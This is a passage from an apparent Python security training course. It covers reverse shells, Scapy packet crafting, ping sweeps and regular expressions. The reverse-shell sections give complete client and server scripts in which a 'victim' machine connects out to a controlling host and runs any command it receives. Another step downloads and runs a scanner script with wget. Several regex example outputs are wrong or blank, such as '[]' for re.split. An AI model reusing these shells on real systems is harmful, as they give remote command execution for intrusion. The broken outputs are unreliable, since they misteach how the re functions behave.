  1283. ----------------------------------------------------------------------
  1284.  
  1285. - then check if 8080 port is open, and if we are listening on 8080:
  1286.  
  1287. ---------------------------Type This-----------------------------------
  1288.  
  1289. netstat -antp | grep "8080"
  1290.  
  1291. ----------------------------------------------------------------------
  1292.  
  1293. - Then on victim ( Windows ) unit run client.py code.
  1294.  
  1295.  
  1296. - Connection will be established, and you will get a shell on Ubuntu:
  1297.  
  1298. ---------------------------Type This-----------------------------------
  1299.  
  1300. infosecaddicts@ubuntu:~$ python server.py
  1301. [+] We got a connection from: ('192.168.243.1', 56880)
  1302. Shell> arp -a
  1303.  
  1304. Shell> ipconfig
  1305.  
  1306. Shell> dir
  1307. ----------------------------------------------------------------------
  1308.  
  1309.  
  1310. ##########################################
  1311. # HTTP based reverse shell in Python 2.7 #
  1312. ##########################################
  1313.  
  1314.  
  1315. - The easiest way to install python modules and keep them up-to-date is with a Python-based package manager called Pip
  1316. - Download get-pip.py from https://bootstrap.pypa.io/get-pip.py on your Windows machine
  1317.  
  1318. Then run python get-pip.py from command line. Once pip is installed you may use it to install packages.
  1319.  
  1320. - Install requests package:
  1321. ---------------------------Type This-----------------------------------
  1322.  
  1323. python -m pip install requests
  1324.  
  1325. ----------------------------------------------------------------------
  1326.  
  1327. - Copy and paste below code into client_http.py on your Windows machine:
  1328.  
  1329. - In my case server/ubuntu IP is 192.168.243.150. You need to change IP to your server address, in both codes (client_http.py, server_HTTP.py)
  1330.  
  1331. ---------------------------Paste This-----------------------------------
  1332. # Client
  1333.  
  1334. import requests
  1335. import subprocess
  1336. import time
  1337.  
  1338.  
  1339. while True:
  1340. req = requests.get('http://192.168.243.150')
  1341. command = req.text
  1342.  
  1343. if 'terminate' in command:
  1344. break
  1345.  
  1346. else:
  1347. CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
  1348. post_response = requests.post(url='http://192.168.243.150', data=CMD.stdout.read() )
  1349. post_response = requests.post(url='http://192.168.243.150', data=CMD.stderr.read() )
  1350.  
  1351. time.sleep(3)
  1352.  
  1353.  
  1354.  
  1355.  
  1356. ----------------------------------------------------------------------
  1357.  
  1358.  
  1359.  
  1360. - Copy and paste below code into server_HTTP.py on your Ubuntu unit (server):
  1361.  
  1362.  
  1363. ---------------------------Paste This-----------------------------------
  1364.  
  1365. import BaseHTTPServer
  1366. HOST_NAME = '192.168.243.150'
  1367. PORT_NUMBER = 80
  1368. class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
  1369.  
  1370. def do_GET(s):
  1371. command = raw_input("Shell> ")
  1372. s.send_response(200)
  1373. s.send_header("Content-type", "text/html")
  1374. s.end_headers()
  1375. s.wfile.write(command)
  1376.  
  1377.  
  1378. def do_POST(s):
  1379. s.send_response(200)
  1380. s.end_headers()
  1381. length = int(s.headers['Content-Length'])
  1382. postVar = s.rfile.read(length)
  1383. print postVar
  1384.  
  1385. if __name__ == '__main__':
  1386. server_class = BaseHTTPServer.HTTPServer
  1387. httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)
  1388.  
  1389. try:
  1390. httpd.serve_forever()
  1391. except KeyboardInterrupt:
  1392. print'[!] Server is terminated'
  1393. httpd.server_close()
  1394.  
  1395. ----------------------------------------------------------------------
  1396.  
  1397. - run server_HTTP.py on Ubuntu with next command:
  1398.  
  1399. ---------------------------Type This-----------------------------------
  1400.  
  1401. infosecaddicts@ubuntu:~$ sudo python server_HTTP.py
  1402.  
  1403. ----------------------------------------------------------------------
  1404.  
  1405.  
  1406. - on Windows machine run client_http.py
  1407.  
  1408. - on Ubuntu you will see that connection is established:
  1409.  
  1410. ---------------------------Type This-----------------------------------
  1411.  
  1412. infosecaddicts@ubuntu:~$ sudo python server_HTTP.py
  1413. Shell> dir
  1414. ----------------------------------------------------------------------
  1415.  
  1416. 192.168.243.1 - - [25/Sep/2017 12:21:40] "GET / HTTP/1.1" 200 -
  1417. 192.168.243.1 - - [25/Sep/2017 12:21:40] "POST / HTTP/1.1" 200 -
  1418. Volume in drive C has no label.
  1419.  
  1420.  
  1421. ############################################
  1422. # Multi-Threaded Reverse Shell in Python 3 #
  1423. ############################################
  1424.  
  1425.  
  1426. - We'll again create 2 files, one for server and one for client/victim. This code is adjusted to work on python2.7
  1427.  
  1428. Copy and paste code from below into server.py file on Ubuntu(server) machine and run it with command python server.py:
  1429.  
  1430.  
  1431. Server.py code:
  1432. ---------------------------Paste This-----------------------------------
  1433.  
  1434. import socket
  1435. import sys
  1436.  
  1437. # Create socket (allows two computers to connect)
  1438.  
  1439. def socket_create():
  1440. try:
  1441. global host
  1442. global port
  1443. global s
  1444. host = ''
  1445. port = 9999
  1446. s = socket.socket()
  1447. except socket.error as msg:
  1448. print("Socket creation error: " + str(msg))
  1449.  
  1450. # Bind socket to port and wait for connection from client
  1451. def socket_bind():
  1452. try:
  1453. global host
  1454. global port
  1455. global s
  1456. print("Binding socket to port: " + str(port))
  1457. s.bind((host,port))
  1458. s.listen(5)
  1459. except socket.error as msg:
  1460. print("Socket binding error: " + str(msg) + "\n" + "Retrying...")
  1461. socket_bind()
  1462.  
  1463. # Establish a connection with client (socket must be listening for them)
  1464. def socket_accept():
  1465. conn, address = s.accept()
  1466. print("Connection has been established | " + "IP " + address[0] + " | Port " + str(address[1]))
  1467. send_commands(conn)
  1468. conn.close()
  1469.  
  1470.  
  1471. # Send commands
  1472. def send_commands(conn):
  1473. while True:
  1474. cmd = raw_input() #input() is changed to raw_input() in order to work on python2.7
  1475. if cmd == 'quit':
  1476. conn.close()
  1477. s.close()
  1478. sys.exit()
  1479. if len(str.encode(cmd))>0:
  1480. conn.send(str.encode(cmd))
  1481. client_response = str(conn.recv(1024)) # had issue with encoding and I have removed utf-8 from client_response = str(conn.recv(1024),"utf-8")
  1482. print(client_response)
  1483.  
  1484. # References for str.encode/decode
  1485. # https://www.tutorialspoint.com/python/string_encode.htm
  1486. # https://www.tutorialspoint.com/python/string_decode.htm
  1487.  
  1488.  
  1489. def main():
  1490. socket_create()
  1491. socket_bind()
  1492. socket_accept()
  1493.  
  1494. main()
  1495.  
  1496.  
  1497.  
  1498. ----------------------------------------------------------------------
  1499.  
  1500.  
  1501. -After you have aleady run server.py on Ubuntu, you can then run client.py file from Windows(client) unit. Code is below:
  1502.  
  1503. Client.py code:
  1504.  
  1505. ---------------------------Paste This-----------------------------------
  1506.  
  1507. import os
  1508. import socket
  1509. import subprocess
  1510.  
  1511. s = socket.socket()
  1512. host = '192.168.243.150' # change to IP address of your server
  1513. port = 9999
  1514. s.connect((host, port))
  1515.  
  1516. while True:
  1517. data = s.recv(1024)
  1518. if data[:2].decode("utf-8") == 'cd':
  1519. os.chdir(data[3:].decode("utf-8"))
  1520. if len(data) > 0:
  1521. cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
  1522. output_bytes = cmd.stdout.read() + cmd.stderr.read()
  1523. output_str = str(output_bytes) # had issue with encoding, in origin code is output_str = str(output_bytes, "utf-8")
  1524. s.send(str.encode(output_str + str(os.getcwd()) + '> '))
  1525. print(output_str)
  1526. # References for str.encode/decode
  1527. # https://www.tutorialspoint.com/python/string_encode.htm
  1528. # https://www.tutorialspoint.com/python/string_decode.htm
  1529.  
  1530. # Close connection
  1531. s.close()
  1532.  
  1533.  
  1534. ----------------------------------------------------------------------
  1535.  
  1536. ---------------------------Type This-----------------------------------
  1537.  
  1538. python client.py
  1539. ----------------------------------------------------------------------
  1540.  
  1541. - Then return back to Ubuntu and you will see that connection is established and you can run commands from shell.
  1542.  
  1543. ---------------------------Type This-----------------------------------
  1544.  
  1545. infosecaddicts@ubuntu:~$ python server.py
  1546.  
  1547. ----------------------------------------------------------------------
  1548.  
  1549. Binding socket to port: 9999
  1550. Connection has been established | IP 192.168.243.1 | Port 57779
  1551. dir
  1552. Volume in drive C has no label.
  1553.  
  1554.  
  1555. Directory of C:\Python27
  1556.  
  1557.  
  1558.  
  1559.  
  1560.  
  1561.  
  1562.  
  1563.  
  1564.  
  1565.  
  1566.  
  1567. ###############################
  1568. # Lesson 21: Installing Scapy #
  1569. ###############################
  1570.  
  1571. ---------------------------Type This-----------------------------------
  1572.  
  1573. sudo apt-get update
  1574. sudo apt-get install python-scapy python-pyx python-gnuplot
  1575.  
  1576. ----------------------------------------------------------------------
  1577.  
  1578. Reference Page For All Of The Commands We Will Be Running:
  1579. http://samsclass.info/124/proj11/proj17-scapy.html
  1580.  
  1581. Great slides for Scapy:
  1582. http://www.secdev.org/conf/scapy_csw05.pdf
  1583.  
  1584.  
  1585.  
  1586.  
  1587. To run Sapy interactively
  1588. ---------------------------Type This-----------------------------------
  1589.  
  1590. sudo scapy
  1591.  
  1592. ----------------------------------------------------------------------
  1593.  
  1594.  
  1595. ################################################
  1596. # Lesson 22: Sending ICMPv4 Packets with scapy #
  1597. ################################################
  1598.  
  1599. In the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter key:
  1600.  
  1601. ---------------------------Type This-----------------------------------
  1602.  
  1603. i = IP()
  1604.  
  1605. ----------------------------------------------------------------------
  1606.  
  1607.  
  1608.  
  1609. This creates an object named i of type IP. To see the properties of that object, use the display() method with this command:
  1610.  
  1611. ---------------------------Type This-----------------------------------
  1612.  
  1613. i.display()
  1614.  
  1615. ----------------------------------------------------------------------
  1616.  
  1617.  
  1618.  
  1619. Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine:
  1620.  
  1621. ---------------------------Type This-----------------------------------
  1622.  
  1623. i.dst="10.65.75.49"
  1624.  
  1625. i.display()
  1626.  
  1627.  
  1628. ----------------------------------------------------------------------
  1629.  
  1630.  
  1631. Notice that scapy automatically fills in your machine's source IP address.
  1632.  
  1633. Use these commands to create an object named ic of type ICMP and display its properties:
  1634.  
  1635. ---------------------------Type This-----------------------------------
  1636.  
  1637. ic = ICMP()
  1638.  
  1639. ic.display()
  1640.  
  1641.  
  1642. ----------------------------------------------------------------------
  1643.  
  1644.  
  1645.  
  1646. Use this command to send the packet onto the network and listen to a single packet in response. Note that the third character is the numeral 1, not a lowercase L:
  1647.  
  1648. ---------------------------Type This-----------------------------------
  1649.  
  1650. sr1(i/ic)
  1651.  
  1652. ----------------------------------------------------------------------
  1653.  
  1654.  
  1655.  
  1656.  
  1657. This command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4. As you can see in the image above, the response is shown, with ICMP type echo-reply.
  1658.  
  1659. The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding.
  1660.  
  1661. Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name):
  1662.  
  1663. ---------------------------Type This-----------------------------------
  1664.  
  1665. sr1(i/ic/"YOUR NAME")
  1666.  
  1667. ----------------------------------------------------------------------
  1668.  
  1669. You should see a reply with a Raw section containing your name.
  1670.  
  1671.  
  1672.  
  1673. ##############################################
  1674. # Lesson 23: Sending a UDP Packet with Scapy #
  1675. ##############################################
  1676.  
  1677.  
  1678. Preparing the Target
  1679.  
  1680. ---------------------------Type This-----------------------------------
  1681.  
  1682. $ ncat -ulvp 4444
  1683.  
  1684. ----------------------------------------------------------------------
  1685.  
  1686.  
  1687.  
  1688. --open another terminal--
  1689. In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the Enter key:
  1690.  
  1691. ---------------------------Type This-----------------------------------
  1692.  
  1693.  
  1694. u = UDP()
  1695.  
  1696. u.display()
  1697.  
  1698. ----------------------------------------------------------------------
  1699.  
  1700.  
  1701. This creates an object named u of type UDP, and displays its properties.
  1702.  
  1703. Execute these commands to change the destination port to 4444 and display the properties again:
  1704.  
  1705. ---------------------------Type This-----------------------------------
  1706.  
  1707. i.dst="10.10.2.97" <--- replace this with a host that you can run netcat on (ex: another VM or your host computer)
  1708.  
  1709. u.dport = 4444
  1710.  
  1711. u.display()
  1712.  
  1713. ----------------------------------------------------------------------
  1714.  
  1715.  
  1716. Execute this command to send the packet to the Windows machine:
  1717.  
  1718. ---------------------------Type This-----------------------------------
  1719.  
  1720. send(i/u/"YOUR NAME SENT VIA UDP\n")
  1721.  
  1722. ----------------------------------------------------------------------
  1723.  
  1724.  
  1725. On the Windows target, you should see the message appear
  1726.  
  1727.  
  1728.  
  1729.  
  1730. #######################################
  1731. # Lesson 24: Ping Sweeping with Scapy #
  1732. #######################################
  1733.  
  1734. ---------------------------Paste This-----------------------------------
  1735.  
  1736.  
  1737. #!/usr/bin/python
  1738. from scapy.all import *
  1739.  
  1740. TIMEOUT = 2
  1741. conf.verb = 0
  1742. for ip in range(0, 256):
  1743. packet = IP(dst="10.10.30." + str(ip), ttl=20)/ICMP()
  1744. # You will need to change 10.10.30 above this line to the subnet for your network
  1745. reply = sr1(packet, timeout=TIMEOUT)
  1746. if not (reply is None):
  1747. print reply.dst, "is online"
  1748. else:
  1749. print "Timeout waiting for %s" % packet[IP].dst
  1750.  
  1751. ----------------------------------------------------------------------
  1752.  
  1753.  
  1754. ###############################################
  1755. # Checking out some scapy based port scanners #
  1756. ###############################################
  1757.  
  1758. ---------------------------Type This-----------------------------------
  1759.  
  1760. wget https://s3.amazonaws.com/infosecaddictsfiles/rdp_scan.py
  1761.  
  1762. cat rdp_scan.py
  1763.  
  1764. sudo python rdp_scan.py
  1765.  
  1766. ----------------------------------------------------------------------
  1767.  
  1768. ######################################
  1769. # Dealing with conf.verb=0 NameError #
  1770. ######################################
  1771.  
  1772. ---------------------------Type This-----------------------------------
  1773.  
  1774. conf.verb = 0
  1775. NameError: name 'conf' is not defined
  1776.  
  1777. Fixing scapy - some scripts are written for the old version of scapy so you'll have to change the following line from:
  1778.  
  1779. from scapy import *
  1780. to
  1781. from scapy.all import *
  1782. -----------------------------------------------------------------------
  1783.  
  1784.  
  1785.  
  1786. Reference:
  1787. http://hexale.blogspot.com/2008/10/wifizoo-and-new-version-of-scapy.html
  1788.  
  1789.  
  1790. conf.verb=0 is a verbosity setting (configuration/verbosity = conv
  1791.  
  1792.  
  1793.  
  1794. Here are some good Scapy references:
  1795. http://www.secdev.org/projects/scapy/doc/index.html
  1796. http://resources.infosecinstitute.com/port-scanning-using-scapy/
  1797. http://www.hackerzvoice.net/ouah/blackmagic.txt
  1798. http://www.workrobot.com/sansfire2009/SCAPY-packet-crafting-reference.html
  1799.  
  1800.  
  1801.  
  1802.  
  1803.  
  1804.  
  1805.  
  1806.  
  1807.  
  1808.  
  1809.  
  1810.  
  1811. ##################################
  1812. # Lesson 25: Regular Expressions #
  1813. ##################################
  1814.  
  1815.  
  1816.  
  1817. **************************************************
  1818. * What is Regular Expression and how is it used? *
  1819. **************************************************
  1820.  
  1821.  
  1822. Simply put, regular expression is a sequence of character(s) mainly used to find and replace patterns in a string or file.
  1823.  
  1824.  
  1825. Regular expressions use two types of characters:
  1826.  
  1827. a) Meta characters: As the name suggests, these characters have a special meaning, similar to * in wildcard.
  1828.  
  1829. b) Literals (like a,b,1,2…)
  1830.  
  1831.  
  1832. In Python, we have module "re" that helps with regular expressions. So you need to import library re before you can use regular expressions in Python.
  1833.  
  1834.  
  1835. Use this code --> import re
  1836.  
  1837.  
  1838.  
  1839.  
  1840. The most common uses of regular expressions are:
  1841. --------------------------------------------------
  1842.  
  1843. - Search a string (search and match)
  1844. - Finding a string (findall)
  1845. - Break string into a sub strings (split)
  1846. - Replace part of a string (sub)
  1847.  
  1848.  
  1849.  
  1850. Let's look at the methods that library "re" provides to perform these tasks.
  1851.  
  1852.  
  1853.  
  1854. ****************************************************
  1855. * What are various methods of Regular Expressions? *
  1856. ****************************************************
  1857.  
  1858.  
  1859. The ‘re' package provides multiple methods to perform queries on an input string. Here are the most commonly used methods, I will discuss:
  1860.  
  1861. re.match()
  1862. re.search()
  1863. re.findall()
  1864. re.split()
  1865. re.sub()
  1866. re.compile()
  1867.  
  1868. Let's look at them one by one.
  1869.  
  1870.  
  1871. re.match(pattern, string):
  1872. -------------------------------------------------
  1873.  
  1874. This method finds match if it occurs at start of the string. For example, calling match() on the string ‘AV Analytics AV' and looking for a pattern ‘AV' will match. However, if we look for only Analytics, the pattern will not match. Let's perform it in python now.
  1875.  
  1876. Code
  1877. ---------------------------Type This-----------------------------------
  1878.  
  1879. import re
  1880. result = re.match(r'AV', 'AV Analytics ESET AV')
  1881. print result
  1882. ----------------------------------------------------------------------
  1883.  
  1884. Output:
  1885. <_sre.SRE_Match object at 0x0000000009BE4370>
  1886.  
  1887. Above, it shows that pattern match has been found. To print the matching string we'll use method group (It helps to return the matching string). Use "r" at the start of the pattern string, it designates a python raw string.
  1888.  
  1889. ---------------------------Type This-----------------------------------
  1890.  
  1891. result = re.match(r'AV', 'AV Analytics ESET AV')
  1892. print result.group(0)
  1893. ----------------------------------------------------------------------
  1894.  
  1895. Output:
  1896. AV
  1897.  
  1898.  
  1899. Let's now find ‘Analytics' in the given string. Here we see that string is not starting with ‘AV' so it should return no match. Let's see what we get:
  1900.  
  1901.  
  1902. Code
  1903. ---------------------------Type This-----------------------------------
  1904.  
  1905. result = re.match(r'Analytics', 'AV Analytics ESET AV')
  1906. print result
  1907. ----------------------------------------------------------------------
  1908.  
  1909.  
  1910. Output:
  1911. None
  1912.  
  1913.  
  1914. There are methods like start() and end() to know the start and end position of matching pattern in the string.
  1915.  
  1916. Code
  1917. ---------------------------Type This-----------------------------------
  1918.  
  1919. result = re.match(r'AV', 'AV Analytics ESET AV')
  1920. print result.start()
  1921. print result.end()
  1922. ----------------------------------------------------------------------
  1923.  
  1924. Output:
  1925. 0
  1926. 2
  1927.  
  1928. Above you can see that start and end position of matching pattern ‘AV' in the string and sometime it helps a lot while performing manipulation with the string.
  1929.  
  1930.  
  1931.  
  1932.  
  1933.  
  1934. re.search(pattern, string):
  1935. -----------------------------------------------------
  1936.  
  1937.  
  1938. It is similar to match() but it doesn't restrict us to find matches at the beginning of the string only. Unlike previous method, here searching for pattern ‘Analytics' will return a match.
  1939.  
  1940. Code
  1941. ---------------------------Type This-----------------------------------
  1942.  
  1943. result = re.search(r'Analytics', 'AV Analytics ESET AV')
  1944. print result.group(0)
  1945. ----------------------------------------------------------------------
  1946.  
  1947. Output:
  1948. Analytics
  1949.  
  1950. Here you can see that, search() method is able to find a pattern from any position of the string but it only returns the first occurrence of the search pattern.
  1951.  
  1952.  
  1953.  
  1954.  
  1955.  
  1956.  
  1957. re.findall (pattern, string):
  1958. ------------------------------------------------------
  1959.  
  1960.  
  1961. It helps to get a list of all matching patterns. It has no constraints of searching from start or end. If we will use method findall to search ‘AV' in given string it will return both occurrence of AV. While searching a string, I would recommend you to use re.findall() always, it can work like re.search() and re.match() both.
  1962.  
  1963.  
  1964. Code
  1965. ---------------------------Type This-----------------------------------
  1966.  
  1967. result = re.findall(r'AV', 'AV Analytics ESET AV')
  1968. print result
  1969. ----------------------------------------------------------------------
  1970.  
  1971. Output:
  1972. ['AV', 'AV']
  1973.  
  1974.  
  1975.  
  1976.  
  1977.  
  1978. re.split(pattern, string, [maxsplit=0]):
  1979. ------------------------------------------------------
  1980.  
  1981.  
  1982.  
  1983. This methods helps to split string by the occurrences of given pattern.
  1984.  
  1985.  
  1986. Code
  1987. ---------------------------Type This-----------------------------------
  1988.  
  1989. result=re.split(r'y','Analytics')
  1990. result
  1991. ----------------------------------------------------------------------
  1992.  
  1993. Output:
  1994. []
  1995.  
  1996. Above, we have split the string "Analytics" by "y". Method split() has another argument "maxsplit". It has default value of zero. In this case it does the maximum splits that can be done, but if we give value to maxsplit, it will split the string. Let's look at the example below:
  1997.  
  1998.  
  1999. Code
  2000. ---------------------------Type This-----------------------------------
  2001.  
  2002. result=re.split(r's','Analytics eset')
  2003. print result
  2004. ----------------------------------------------------------------------
  2005.  
  2006. Output:
  2007. ['Analytic', ' e', 'et'] #It has performed all the splits that can be done by pattern "s".
  2008.  
  2009.  
  2010.  
  2011. Code
  2012. ---------------------------Type This-----------------------------------
  2013.  
  2014. result=re.split(r's','Analytics eset',maxsplit=1)
  2015. result
  2016. ----------------------------------------------------------------------
  2017.  
  2018. Output:
  2019. []
  2020.  
  2021.  
  2022.  
  2023.  
  2024.  
  2025. re.sub(pattern, repl, string):
  2026. ----------------------------------------------------------
  2027.  
  2028. It helps to search a pattern and replace with a new sub string. If the pattern is not found, string is returned unchanged.
  2029.  
  2030. Code
  2031. ---------------------------Type This-----------------------------------
  2032.  
  2033. result=re.sub(r'Ruby','Python','Joe likes Ruby')
  2034. result
  2035. ----------------------------------------------------------------------
  2036.  
  2037. Output:
  2038. ''
  2039.  
  2040.  
  2041.  
  2042.  
  2043.  
  2044. re.compile(pattern, repl, string):
  2045. ----------------------------------------------------------
  2046.  
  2047.  
  2048. We can combine a regular expression pattern into pattern objects, which can be used for pattern matching. It also helps to search a pattern again without rewriting it.
  2049.  
  2050.  
  2051. Code
  2052. ---------------------------Type This-----------------------------------
  2053.  
  2054. import re
  2055. pattern=re.compile('XSS')
  2056. result=pattern.findall('XSS is Cross Site Scripting, XSS')
  2057. print result
  2058. result2=pattern.findall('XSS is Cross Site Scripting, SQLi is Sql Injection')
  2059. print result2
  2060. ----------------------------------------------------------------------
  2061.  
  2062. Output:
  2063. ['XSS', 'XSS']
  2064. ['XSS']
  2065.  
  2066. Till now, we looked at various methods of regular expression using a constant pattern (fixed characters). But, what if we do not have a constant search pattern and we want to return specific set of characters (defined by a rule) from a string? Don't be intimidated.
  2067.  
  2068. This can easily be solved by defining an expression with the help of pattern operators (meta and literal characters). Let's look at the most common pattern operators.
  2069.  
  2070.  
  2071.  
  2072.  
  2073. ############################################
  2074. # Lesson 26: Regular Expressions operators #
  2075. ############################################
  2076.  
  2077. **********************************************
  2078. * What are the most commonly used operators? *
  2079. **********************************************
  2080.  
  2081.  
  2082. Regular expressions can specify patterns, not just fixed characters. Here are the most commonly used operators that helps to generate an expression to represent required characters in a string or file. It is commonly used in web scrapping and text mining to extract required information.
  2083.  
  2084. Operators Description
  2085. . Matches with any single character except newline ‘\n'.
  2086. ? match 0 or 1 occurrence of the pattern to its left
  2087. + 1 or more occurrences of the pattern to its left
  2088. * 0 or more occurrences of the pattern to its left
  2089. \w Matches with a alphanumeric character whereas \W (upper case W) matches non alphanumeric character.
  2090. \d Matches with digits [0-9] and /D (upper case D) matches with non-digits.
  2091. \s Matches with a single white space character (space, newline, return, tab, form) and \S (upper case S) matches any non-white space character.
  2092. \b boundary between word and non-word and /B is opposite of /b
  2093. [..] Matches any single character in a square bracket and [^..] matches any single character not in square bracket
  2094. \ It is used for special meaning characters like \. to match a period or \+ for plus sign.
  2095. ^ and $ ^ and $ match the start or end of the string respectively
  2096. {n,m} Matches at least n and at most m occurrences of preceding expression if we write it as {,m} then it will return at least any minimum occurrence to max m preceding expression.
  2097. a| b Matches either a or b
  2098. ( ) Groups regular expressions and returns matched text
  2099. \t, \n, \r Matches tab, newline, return
  2100.  
  2101.  
  2102. For more details on meta characters "(", ")","|" and others details , you can refer this link (https://docs.python.org/2/library/re.html).
  2103.  
  2104. Now, let's understand the pattern operators by looking at the below examples.
  2105.  
  2106.  
  2107.  
  2108. ****************************************
  2109. * Some Examples of Regular Expressions *
  2110. ****************************************
  2111.  
  2112. ******************************************************
  2113. * Problem 1: Return the first word of a given string *
  2114. ******************************************************
  2115.  
  2116.  
  2117. Solution-1 Extract each character (using "\w")
  2118. ---------------------------------------------------------------------------
  2119.  
  2120. Code
  2121. ---------------------------Type This-----------------------------------
  2122.  
  2123. import re
  2124. result=re.findall(r'.','Python is the best scripting language')
  2125. print result
  2126. ----------------------------------------------------------------------
  2127.  
  2128. Output:
  2129. ['P', 'y', 't', 'h', 'o', 'n', ' ', 'i', 's', ' ', 't', 'h', 'e', ' ', 'b', 'e', 's', 't', ' ', 's', 'c', 'r', 'i', 'p', 't', 'i', 'n', 'g', ' ', 'l', 'a', 'n', 'g', 'u', 'a', 'g', 'e']
  2130.  
  2131.  
  2132. Above, space is also extracted, now to avoid it use "\w" instead of ".".
  2133.  
  2134.  
  2135. Code
  2136. ---------------------------Type This-----------------------------------
  2137.  
  2138. result=re.findall(r'\w','Python is the best scripting language')
  2139. print result
  2140. ----------------------------------------------------------------------
  2141.  
  2142. Output:
  2143. ['P', 'y', 't', 'h', 'o', 'n', 'i', 's', 't', 'h', 'e', 'b', 'e', 's', 't', 's', 'c', 'r', 'i', 'p', 't', 'i', 'n', 'g', 'l', 'a', 'n', 'g', 'u', 'a', 'g', 'e']
  2144.  
  2145.  
  2146.  
  2147.  
  2148. Solution-2 Extract each word (using "*" or "+")
  2149. ---------------------------------------------------------------------------
  2150.  
  2151. Code
  2152. ---------------------------Type This-----------------------------------
  2153.  
  2154. result=re.findall(r'\w*','Python is the best scripting language')
  2155. print result
  2156. ----------------------------------------------------------------------
  2157.  
  2158. Output:
  2159. ['Python', '', 'is', '', 'the', '', 'best', '', 'scripting', '', 'language', '']
  2160.  
  2161.  
  2162. Again, it is returning space as a word because "*" returns zero or more matches of pattern to its left. Now to remove spaces we will go with "+".
  2163.  
  2164. Code
  2165. ---------------------------Type This-----------------------------------
  2166.  
  2167. result=re.findall(r'\w+','Python is the best scripting language')
  2168. print result
  2169. ----------------------------------------------------------------------
  2170.  
  2171. Output:
  2172. ['Python', 'is', 'the', 'best', 'scripting', 'language']
  2173.  
  2174.  
  2175.  
  2176.  
  2177. Solution-3 Extract each word (using "^")
  2178. -------------------------------------------------------------------------------------
  2179.  
  2180.  
  2181. Code
  2182. ---------------------------Type This-----------------------------------
  2183.  
  2184. result=re.findall(r'^\w+','Python is the best scripting language')
  2185. print result
  2186. ----------------------------------------------------------------------
  2187.  
  2188. Output:
  2189. ['Python']
  2190.  
  2191. If we will use "$" instead of "^", it will return the word from the end of the string. Let's look at it.
  2192.  
  2193. Code
  2194. ---------------------------Type This-----------------------------------
  2195.  
  2196. result=re.findall(r'\w+$','Python is the best scripting language')
  2197. print result
  2198. ----------------------------------------------------------------------
  2199.  
  2200. Output:
  2201. [‘language']
  2202.  
  2203.  
  2204.  
  2205.  
  2206.  
  2207. **********************************************************
  2208. * Problem 2: Return the first two character of each word *
  2209. **********************************************************
  2210.  
  2211.  
  2212.  
  2213.  
  2214. Solution-1 Extract consecutive two characters of each word, excluding spaces (using "\w")
  2215. ------------------------------------------------------------------------------------------------------
  2216.  
  2217. Code
  2218. ---------------------------Type This-----------------------------------
  2219.  
  2220. result=re.findall(r'\w\w','Python is the best')
  2221. print result
  2222. ----------------------------------------------------------------------
  2223.  
  2224. Output:
  2225. ['Py', 'th', 'on', 'is', 'th', 'be', 'st']
  2226.  
  2227.  
  2228.  
  2229.  
  2230.  
  2231. Solution-2 Extract consecutive two characters those available at start of word boundary (using "\b")
  2232. ------------------------------------------------------------------------------------------------------
  2233.  
  2234. Code
  2235. ---------------------------Type This-----------------------------------
  2236.  
  2237. result=re.findall(r'\b\w.','Python is the best')
  2238. print result
  2239. ----------------------------------------------------------------------
  2240.  
  2241. Output:
  2242. ['Py', 'is', 'th', 'be']
  2243.  
  2244.  
  2245.  
  2246.  
  2247.  
  2248.  
  2249. ********************************************************
  2250. * Problem 3: Return the domain type of given email-ids *
  2251. ********************************************************
  2252.  
  2253.  
  2254. To explain it in simple manner, I will again go with a stepwise approach:
  2255.  
  2256.  
  2257.  
  2258.  
  2259.  
  2260. Solution-1 Extract all characters after "@"
  2261. ------------------------------------------------------------------------------------------------------------------
  2262.  
  2263. Code
  2264. ---------------------------Type This-----------------------------------
  2265.  
  2266. result=re.findall(r'@\w+','abc.test@gmail.com, xyz@test.com, test.first@strategicsec.com, first.test@rest.biz')
  2267. print result
  2268. ----------------------------------------------------------------------
  2269.  
  2270. Output: ['@gmail', '@test', '@strategicsec', '@rest']
  2271.  
  2272.  
  2273.  
  2274. Above, you can see that ".com", ".biz" part is not extracted. To add it, we will go with below code.
  2275.  
  2276. ---------------------------Type This-----------------------------------
  2277.  
  2278. result=re.findall(r'@\w+.\w+','abc.test@gmail.com, xyz@test.com, test.first@strategicsec.com, first.test@rest.biz')
  2279. print result
  2280. ----------------------------------------------------------------------
  2281.  
  2282. Output:
  2283. ['@gmail.com', '@test.com', '@strategicsec.com', '@rest.biz']
  2284.  
  2285.  
  2286.  
  2287.  
  2288.  
  2289.  
  2290. Solution – 2 Extract only domain name using "( )"
  2291. -----------------------------------------------------------------------------------------------------------------------
  2292.  
  2293.  
  2294. Code
  2295. ---------------------------Type This-----------------------------------
  2296.  
  2297. result=re.findall(r'@\w+.(\w+)','abc.test@gmail.com, xyz@test.com, test.first@strategicsec.com, first.test@rest.biz')
  2298. print result
  2299. ----------------------------------------------------------------------
  2300.  
  2301. Output:
  2302. ['com', 'com', 'com', 'biz']
  2303.  
  2304.  
  2305.  
  2306.  
  2307.  
  2308.  
  2309. ********************************************
  2310. * Problem 4: Return date from given string *
  2311. ********************************************
  2312.  
  2313.  
  2314. Here we will use "\d" to extract digit.
  2315.  
  2316.  
  2317. Solution:
  2318. ----------------------------------------------------------------------------------------------------------------------
  2319.  
  2320. Code
  2321. ---------------------------Type This-----------------------------------
  2322.  
  2323. result=re.findall(r'\d{2}-\d{2}-\d{4}','Joe 34-3456 12-05-2007, XYZ 56-4532 11-11-2016, ABC 67-8945 12-01-2009')
  2324. print result
  2325. ----------------------------------------------------------------------
  2326.  
  2327. Output:
  2328. ['12-05-2007', '11-11-2016', '12-01-2009']
  2329.  
  2330. If you want to extract only year again parenthesis "( )" will help you.
  2331.  
  2332.  
  2333. Code
  2334.  
  2335. ---------------------------Type This-----------------------------------
  2336.  
